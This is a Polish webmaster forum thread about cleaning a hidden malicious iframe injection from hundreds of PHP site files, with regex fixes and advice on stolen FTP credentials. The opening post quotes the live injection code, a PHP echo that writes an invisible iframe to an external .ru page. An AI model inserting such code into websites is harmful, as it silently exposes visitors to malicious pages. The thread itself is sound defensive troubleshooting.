Wirus dolepił IFRAME'a

[lukaszr]

Witam,

Proszę o pomoc z modyfikacją $pattern

Kod wirusa:

<?
#8c2699#
echo "    <script type=\"text/javascript\" language=\"javascript\" >                   document.write('<iframe src=\"https://jaqvicmy.ru/count7.php\" border=\"0\" width=\"0\" height=\"0\" style=\"display:none\"></iframe>');</script>";
#/8c2699#
?>

Próbowałem z 3 godziny modyfikować:

$pattern="/<iframe src=\".*\" width=1 height=1.*\"><\/iframe>/";

Niestety nie wychodzi :/ - Proszę o pomoć.

Dzięki

[bluesem]

Zacząc należy od wyczyszczenia kompa z wirusa, zmiany haseł ftp i nie trzymania ich w programach typu TC czy filezilla. Wirus z nich czyta hasła i wgrywa plik odpowiadający za infekcję. Poza wyczyszczeniem kodu trzeba zlokalizować plik ze skryptem, który powoduje infekcje oraz wyczyścić htaccess.

[lukaszr]

To już mam wykonane teraz chce usunąć wirusa z ponad 1000 plików i mam problem bo kurcze ręcznie to masakra. Próbowałem wyżej podanym skrypt przerobić:

$pattern="/#8c2699#(.*)#\/8c2699#/";

I nie usuwa ciągu znaków :/ w wirusie mam spacje i entery to może dlatego (.*) -> nie działa?

[Irek]

$pattern="/#8c2699#.*#\/8c2699#/s";

[Linkerzy]

Niestety taka plaga jest teraz straszna. Jak się nie mylę to avast to wykrywa Mi w wordpressie w plik theme wpadł..

[flasza.pl]

Ja wczoraj usuwałem znajomemu ręcznie z Joomli, podoklejało się do wszystkich plików widoków, i w każdym pliku miało troszeczkę składnię co nie dało się automatycznie podmienić. Miał trojana na komputerze i używał TC

[vivamachine]

Podbijam gdyby komuś się przydało:

https://semarch.pl/aktualnosci_news_1012_nigdy-wiecej-zlosliwego-iframe---detektor.html

Udostępniliśmy prosty darmowy skrypt do monitoringu witryn

Gdy macie zaledwie kilku klientów możecie uznać to za wartościową pomoc.

Charakterystyka w opisie, może w wolnej chwili napiszemy jakiś instruktarz instalacji ale póki co nie przewidujemy:-)

Skrypt na zasadzie - jest i działa. Na pewno poinformuje Was o infekcji strony praktycznie od razu.

W razie pytań proszę o priv,

Pozdro:)

[aneta2013]

Hej,

Nie wiem co robię nie tak. Uruchomiłam skrypt podany w wątku, poprawiony o $pattern="/\/\*qpi\*\/(.*?)\/\*qpi\*\//"; i wyskakuje mi takie coś:

$file) { echo "

Sprawdzam plik ".$file ."

"; $contents=@file_get_contents($file); $ncontents=preg_replace($pattern, "", $contents, -1, $count); if($count != '0') { if($kasuj == 1) if(@file_put_contents($file, $ncontents)) echo "

Znaleziono i pomyslnie skasowano iframe z pliku ".$file."

"; else echo "

Znaleziono lecz nie udało się usunac iframe z pliku ".$file."

"; } else echo "

Plik ".$file." nie jest zainfekowany

"; } ?>

i tylko to.... A wirus dalej siedzi w stronie Może znajdzie się ktoś kto mi powie co robię źle? Czy mam podać jakieś dodatkowe szczegóły?

Będę wdzięczna za odpowiedź!

[patro]

https://code.google.com/p/ggrep/ tym programem spróbuj.

[Tomek_XX]

Jakiś czas temu sprawdziłem odnośniki z jakich wchodzono na moją stronę i okazało się ze były to jakieś zagraniczne serwisy np firmowe o których nie miałem pojęcia. Wejścia nie były z linków na tej stronie tylko z iframe doklejonego do ostatniej lini kodu jaki pokazuje sie w źródle strony. Dziś patrzę ponownie na te strony i doklejony iframe ma już inne strony ( tak jakby linki były w rotacji i nie kierowały do głownej strony serwisów tylko do poddstron które nie istnieją ). nie jest to żadne zaplecze ani nic a mojastrona znalazła się gdzieś tam w pływającej ramce o której nie mam pojęcia ja i przypuszczam właściciel strony. O co chodzi?